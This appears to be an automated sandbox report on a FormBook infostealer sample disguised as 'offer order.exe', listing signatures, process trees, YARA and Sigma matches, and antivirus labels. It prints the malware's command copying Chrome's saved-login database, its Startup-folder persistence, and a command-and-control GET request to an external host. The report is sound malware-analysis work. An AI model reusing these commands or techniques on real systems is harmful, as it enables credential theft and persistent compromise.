
Analysis Report offer order.exe

Overview

General Information

Sample Name: offer order.exe
Analysis ID: 299672
MD5: 92ce59db9a10fa135250802f6716e899
SHA1: 6e70f2b79d7a2db3078636acef019470767a5edf
SHA256: 2aef6190fbec261019520c2e603024eb0abf68eaf2460b3ed7c03c14754e5a09
Tags: exe

Most interesting Screenshot:

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Detected FormBook malware
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Sigma detected: Steal Google chrome login data
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
AutoIt script contains suspicious strings
Binary is likely a compiled AutoIt script file
Initial sample is a PE file and has a suspicious name
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
PE file has a writeable .text section
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file access)
Uses ipconfig to lookup or modify the Windows network settings
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
OS version to string mapping found (often used in BOTs)
One or more processes crash
PE file contains strange resources
Potential key logger detected (key state polling based)
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Stores files to the Windows start menu directory
Stores large binary data to the registry
Tries to load missing DLLs
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • offer order.exe (PID: 6220 cmdline: 'C:\Users\user\Desktop\offer order.exe' MD5: 92CE59DB9A10FA135250802F6716E899)
    • offer ordermgr.exe (PID: 6232 cmdline: C:\Users\user\Desktop\offer ordermgr.exe MD5: D5CA6E1F080ABC64BBB11E098ACBEABB)
      • WerFault.exe (PID: 6164 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6232 -s 244 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • offer order.exe (PID: 6796 cmdline: C:\Users\user\Desktop\offer order.exe MD5: 92CE59DB9A10FA135250802F6716E899)
      • explorer.exe (PID: 3292 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • wlanext.exe (PID: 3192 cmdline: C:\Windows\SysWOW64\wlanext.exe MD5: CD1ED9A48316D58513D8ECB2D55B5C04)
          • cmd.exe (PID: 6336 cmdline: /c del 'C:\Users\user\UevAppMonitor\igfxCUIService.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6324 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • cmd.exe (PID: 4772 cmdline: /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user~1\AppData\Local\Temp\DB1' /V MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • ipconfig.exe (PID: 6844 cmdline: C:\Windows\SysWOW64\ipconfig.exe MD5: B0C7423D02A007461C850CD0DFE09318)
  • wscript.exe (PID: 6604 cmdline: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\UevAppMonitor\lpremove.vbs' MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
    • igfxCUIService.exe (PID: 5512 cmdline: 'C:\Users\user\UevAppMonitor\igfxCUIService.exe' MD5: 92CE59DB9A10FA135250802F6716E899)
      • igfxCUIServicemgr.exe (PID: 5860 cmdline: C:\Users\user\UevAppMonitor\igfxCUIServicemgr.exe MD5: D5CA6E1F080ABC64BBB11E098ACBEABB)
        • WerFault.exe (PID: 6424 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5860 -s 256 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
      • igfxCUIService.exe (PID: 4484 cmdline: C:\Users\user\UevAppMonitor\igfxCUIService.exe MD5: 92CE59DB9A10FA135250802F6716E899)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Dropped Files

Source | Rule | Description | Author | Strings
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\lpremove.url | Methodology_Suspicious_Shortcut_Local_URL | Detects local script usage for .URL persistence | @itsreallynick (Nick Carr), @QW5kcmV3 (Andrew Thompson)
  • 0x13:$file: URL=file:///
  • 0x0:$url_explicit: [InternetShortcut]

Memory Dumps

Source | Rule | Description | Author | Strings
0000000C.00000002.359244107.0000000001820000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
0000000C.00000002.359244107.0000000001820000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x98b8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b32:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x157c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x152b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x158c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x15a3f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa6ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1452c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb3b3:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1ab37:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1bb3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000C.00000002.359244107.0000000001820000.00000040.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x18449:$sqlite3step: 68 34 1C 7B E1
  • 0x1855c:$sqlite3step: 68 34 1C 7B E1
  • 0x18478:$sqlite3text: 68 38 2A 90 C5
  • 0x1859d:$sqlite3text: 68 38 2A 90 C5
  • 0x1848b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x185b3:$sqlite3blob: 68 53 D8 7F 8C
0000001A.00000002.358304950.00000000001D0000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
0000001A.00000002.358304950.00000000001D0000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x98b8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b32:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x157c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x152b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x158c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x15a3f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa6ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1452c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb3b3:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1ab37:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1bb3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Unpacked PEs

Source | Rule | Description | Author | Strings
22.2.igfxCUIService.exe.400000.1.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
22.2.igfxCUIService.exe.400000.1.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x8ab8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8d32:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x149c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x144b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x14ac7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x14c3f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x98ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1372c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa5b3:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19d37:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1ad3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
22.2.igfxCUIService.exe.400000.1.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x17649:$sqlite3step: 68 34 1C 7B E1
  • 0x1775c:$sqlite3step: 68 34 1C 7B E1
  • 0x17678:$sqlite3text: 68 38 2A 90 C5
  • 0x1779d:$sqlite3text: 68 38 2A 90 C5
  • 0x1768b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x177b3:$sqlite3blob: 68 53 D8 7F 8C
22.2.igfxCUIService.exe.400000.1.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
22.2.igfxCUIService.exe.400000.1.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x98b8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b32:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x157c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x152b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x158c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x15a3f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa6ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1452c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb3b3:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1ab37:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1bb3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Sigma Overview

System Summary:

Sigma detected: Drops script at startup location
Source: File created | Author: Joe Security | Data: EventID: 11, Image: C:\Users\user\Desktop\offer order.exe, ProcessId: 6220, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\lpremove.url
Sigma detected: Steal Google chrome login data
Source: Process started | Author: Joe Security | Data: Command: /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user~1\AppData\Local\Temp\DB1' /V, CommandLine: /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user~1\AppData\Local\Temp\DB1' /V, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: C:\Windows\SysWOW64\wlanext.exe, ParentImage: C:\Windows\SysWOW64\wlanext.exe, ParentProcessId: 3192, ProcessCommandLine: /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user~1\AppData\Local\Temp\DB1' /V, ProcessId: 4772

Signature Overview

AV Detection:

Antivirus / Scanner detection for submitted sample
Source: offer order.exe | Avira: detected
Antivirus detection for dropped file
Source: C:\Users\user\UevAppMonitor\igfxCUIServicemgr.exe | Avira: detection malicious, Label: W32/Sality.AB.2
Source: C:\Users\user\UevAppMonitor\igfxCUIService.exe | Avira: detection malicious, Label: W32/Ramnit.C
Source: C:\Users\user\Desktop\offer ordermgr.exe | Avira: detection malicious, Label: W32/Sality.AB.2
Multi AV Scanner detection for dropped file
Source: C:\Users\user\Desktop\offer ordermgr.exe | Metadefender: Detection: 88%
Source: C:\Users\user\Desktop\offer ordermgr.exe | ReversingLabs: Detection: 100%
Source: C:\Users\user\UevAppMonitor\igfxCUIService.exe | ReversingLabs: Detection: 91%
Source: C:\Users\user\UevAppMonitor\igfxCUIServicemgr.exe | Metadefender: Detection: 88%
Source: C:\Users\user\UevAppMonitor\igfxCUIServicemgr.exe | ReversingLabs: Detection: 100%
Multi AV Scanner detection for submitted file
Source: offer order.exe | ReversingLabs: Detection: 91%
Yara detected FormBook
Source: Yara match | File source: 0000000C.00000002.359244107.0000000001820000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000001A.00000002.358304950.00000000001D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.359207981.00000000017F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000016.00000002.343417017.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000016.00000002.344627421.0000000001710000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.356195697.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000016.00000002.344721716.0000000001740000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000017.00000002.494578696.0000000002BC0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000017.00000002.492758749.0000000000B30000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000017.00000002.491918579.0000000000990000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 22.2.igfxCUIService.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 22.2.igfxCUIService.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 12.2.offer order.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 12.2.offer order.exe.400000.0.raw.unpack, type: UNPACKEDPE
Machine Learning detection for dropped file
Source: C:\Users\user\UevAppMonitor\igfxCUIServicemgr.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\offer ordermgr.exe | Joe Sandbox ML: detected
Source: 22.2.igfxCUIService.exe.40000.0.unpack | Avira: Label: W32/Ramnit.C
Source: 1.2.offer ordermgr.exe.400000.0.unpack | Avira: Label: W32/Sality.AB.2
Source: 22.2.igfxCUIService.exe.400000.1.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 0.0.offer order.exe.dc0000.0.unpack | Avira: Label: W32/Ramnit.C
Source: 12.0.offer order.exe.dc0000.0.unpack | Avira: Label: W32/Ramnit.C
Source: 12.2.offer order.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 12.2.offer order.exe.dc0000.1.unpack | Avira: Label: W32/Ramnit.C
Source: 6.0.igfxCUIService.exe.40000.0.unpack | Avira: Label: W32/Ramnit.C
Source: 1.0.offer ordermgr.exe.400000.0.unpack | Avira: Label: W32/Sality.AB.2
Source: 7.2.igfxCUIServicemgr.exe.400000.0.unpack | Avira: Label: W32/Sality.AB.2
Source: 22.0.igfxCUIService.exe.40000.0.unpack | Avira: Label: W32/Ramnit.C
Source: 7.0.igfxCUIServicemgr.exe.400000.0.unpack | Avira: Label: W32/Sality.AB.2
Source: C:\Users\user\Desktop\offer order.exe | Code function: 12_2_00E24696 GetFileAttributesW,FindFirstFileW,FindClose,12_2_00E24696
Source: C:\Users\user\Desktop\offer order.exe | Code function: 12_2_00E2C9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,12_2_00E2C9C7
Source: C:\Users\user\Desktop\offer order.exe | Code function: 12_2_00E2C93C FindFirstFileW,FindClose,12_2_00E2C93C
Source: C:\Users\user\UevAppMonitor\igfxCUIService.exe | Code function: 22_2_000A4696 GetFileAttributesW,FindFirstFileW,FindClose,22_2_000A4696
Source: C:\Users\user\UevAppMonitor\igfxCUIService.exe | Code function: 22_2_000AC93C FindFirstFileW,FindClose,22_2_000AC93C
Source: C:\Users\user\UevAppMonitor\igfxCUIService.exe | Code function: 22_2_000AC9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,22_2_000AC9C7
Source: C:\Users\user\UevAppMonitor\igfxCUIService.exe | Code function: 22_2_000BCDF1 UnloadUserProfile,InterlockedIncrement,InterlockedDecrement,RaiseException,GetLastError,DecodePointer,IsDebuggerPresent,GetFullPathNameW,GetCurrentProcess,HeapAlloc,GetProcessHeap,HeapFree,Sleep,GetSystemInfo,LoadLibraryA,GetModuleFileNameW,GetCurrentProcess,TerminateProcess,lstrcpyW,VirtualAllocEx,CreateFileW,SetEndOfFile,WriteFile,FindFirstFileW,22_2_000BCDF1
Source: C:\Users\user\UevAppMonitor\igfxCUIService.exe | Code function: 22_2_000AF200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,22_2_000AF200
Source: C:\Users\user\UevAppMonitor\igfxCUIService.exe | Code function: 22_2_000AF35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,22_2_000AF35D
Source: C:\Users\user\Desktop\offer order.exe | Code function: 4x nop then pop edi 12_2_00416D4E
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4x nop then pop edi 23_2_009A6D4E
Source: global traffic | HTTP traffic detected: GET /n7ak/?Cn=2E6ngGAF4rnEW2DkFahn03SThRJS1GaFXvji6cQNcldFxHWCZGztCTkY2xtu2ML79DZ+6HkTcQ==&ojqX_T=8phhJj0P8JsL HTTP/1.1 Host: www.belviderewrestling.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: Joe Sandbox View | ASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US
Source: C:\Users\user\Desktop\offer order.exe | Code function: 12_2_00E325E2 InternetReadFile,InternetQueryDataAvailable,InternetReadFile,12_2_00E325E2
Source: global traffic | HTTP traffic detected: GET /n7ak/?Cn=2E6ngGAF4rnEW2DkFahn03SThRJS1GaFXvji6cQNcldFxHWCZGztCTkY2xtu2ML79DZ+6HkTcQ==&ojqX_T=8phhJj0P8JsL HTTP/1.1 Host: www.belviderewrestling.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: unknown | DNS traffic detected: queries for: www.allworljob.com
Source: WerFault.exe, 00000004.00000003.249097052.00000000031A3000.00000004.00000001.sdmp | String found in binary or memory: http://crl.m
Source: WerFault.exe, 0000000B.00000003.299705606.0000000002A4D000.00000004.00000001.sdmp | String found in binary or memory: http://crl.microH
Source: explorer.exe, 00000010.00000000.326082966.000000000BE76000.00000002.00000001.sdmp | String found in binary or memory: http://fontfabrik.com
Source: explorer.exe, 00000010.00000000.326082966.000000000BE76000.00000002.00000001.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000010.00000000.315474462.0000000006840000.00000004.00000001.sdmp | String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: explorer.exe, 00000010.00000000.326082966.000000000BE76000.00000002.00000001.sdmp | String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000010.00000000.326082966.000000000BE76000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000010.00000000.326082966.000000000BE76000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 00000010.00000000.326082966.000000000BE76000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 00000010.00000000.326082966.000000000BE76000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 00000010.00000000.326082966.000000000BE76000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: explorer.exe, 00000010.00000000.326082966.000000000BE76000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 00000010.00000000.326082966.000000000BE76000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 00000010.00000000.326082966.000000000BE76000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 00000010.00000000.326082966.000000000BE76000.00000002.00000001.sdmp | String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000010.00000000.326082966.000000000BE76000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000010.00000000.326082966.000000000BE76000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000010.00000000.326082966.000000000BE76000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000010.00000000.326082966.000000000BE76000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 00000010.00000000.326082966.000000000BE76000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 00000010.00000000.326082966.000000000BE76000.00000002.00000001.sdmp | String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000010.00000000.326082966.000000000BE76000.00000002.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: WerFault.exe, 00000004.00000003.249097052.00000000031A3000.00000004.00000001.sdmp | String found in binary or memory: http://www.microsoft.co
Source: explorer.exe, 00000010.00000000.326082966.000000000BE76000.00000002.00000001.sdmp | String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000010.00000000.326082966.000000000BE76000.00000002.00000001.sdmp | String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000010.00000000.326082966.000000000BE76000.00000002.00000001.sdmp | String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000010.00000000.326082966.000000000BE76000.00000002.00000001.sdmp | String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000010.00000000.326082966.000000000BE76000.00000002.00000001.sdmp | String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000010.00000000.326082966.000000000BE76000.00000002.00000001.sdmp | String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 00000010.00000000.326082966.000000000BE76000.00000002.00000001.sdmp | String found in binary or memory: http://www.zhongyicts.com.cn
Source: WerFault.exe, 0000000B.00000002.301896121.0000000002A1B000.00000004.00000020.sdmp | String found in binary or memory: https://watson.telemetry.microsoft
Source: C:\Users\user\Desktop\offer order.exe | Code function: 12_2_00E3425A OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,12_2_00E3425A
Source: C:\Users\user\Desktop\offer order.exe | Code function: 12_2_00E3425A OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,12_2_00E3425A
Source: C:\Users\user\Desktop\offer order.exe | Code function: 12_2_00E20219 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,12_2_00E20219
Source: igfxCUIServicemgr.exe, 00000007.00000002.307830238.00000000006CA000.00000004.00000020.sdmp | Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
Source: C:\Users\user\Desktop\offer order.exe | Code function: 12_2_00E4CDAC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,12_2_00E4CDAC
Source: C:\Users\user\UevAppMonitor\igfxCUIService.exe | Code function: 22_2_000CCDAC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,22_2_000CCDAC

E-Banking Fraud:

Yara detected FormBook
Source: Yara match | File source: 0000000C.00000002.359244107.0000000001820000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000001A.00000002.358304950.00000000001D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.359207981.00000000017F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000016.00000002.343417017.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000016.00000002.344627421.0000000001710000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.356195697.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000016.00000002.344721716.0000000001740000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000017.00000002.494578696.0000000002BC0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000017.00000002.492758749.0000000000B30000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000017.00000002.491918579.0000000000990000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 22.2.igfxCUIService.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 22.2.igfxCUIService.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 12.2.offer order.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 12.2.offer order.exe.400000.0.raw.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Detected FormBook malware
          Source: C:\Windows\SysWOW64\wlanext.exe | Dropped file: C:\Users\user\AppData\Roaming\95N0Q4RA\95Nlogri.ini
          Malicious sample detected (through community Yara rule)
          Source: 0000000C.00000002.359244107.0000000001820000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000C.00000002.359244107.0000000001820000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
